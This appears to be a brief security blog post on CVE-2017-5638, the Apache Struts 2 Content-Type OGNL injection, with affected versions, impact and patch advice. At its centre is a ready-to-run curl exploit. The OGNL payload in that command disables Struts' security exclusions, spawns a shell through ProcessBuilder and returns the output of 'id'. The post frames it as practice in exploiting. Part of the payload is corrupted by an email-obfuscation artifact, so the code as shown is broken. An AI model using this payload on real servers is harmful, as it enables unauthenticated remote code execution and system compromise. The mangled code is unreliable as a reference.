Listen to this Post
The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. When a malicious Content-Type header is sent in an HTTP request for a file upload, the parser incorrectly processes it. Specifically, if the header contains a crafted `Content-Type` value that triggers an exception, the parser will attempt to interpolate the exception message using Object-Graph Navigation Language (OGNL) expressions before performing input validation. OGNL is a powerful expression language that can execute arbitrary Java code and manipulate the application’s runtime environment. An attacker can embed OGNL expressions within the Content-Type header; these expressions are then evaluated on the server-side. This evaluation occurs with the same permissions as the running Struts application, typically leading to full system compromise. The exploit allows an unauthenticated attacker to submit a simple HTTP POST request with a malicious header, enabling them to run any system command on the vulnerable server with complete control.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability : Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: 2017-03-10
What Undercode Say:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/struts2-showcase/fileupload/doUpload.action`
How Exploit:
Malicious Content-Type header injection.
OGNL expression evaluation.
Arbitrary command execution.
Protection from this CVE
Apply vendor patch immediately.
Upgrade to Struts 2.3.32 or 2.5.10.1.
Filter malicious HTTP headers.
Use a Web Application Firewall (WAF).
Impact:
Complete system compromise.
Unauthenticated remote access.
Data breach and theft.
Service disruption.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
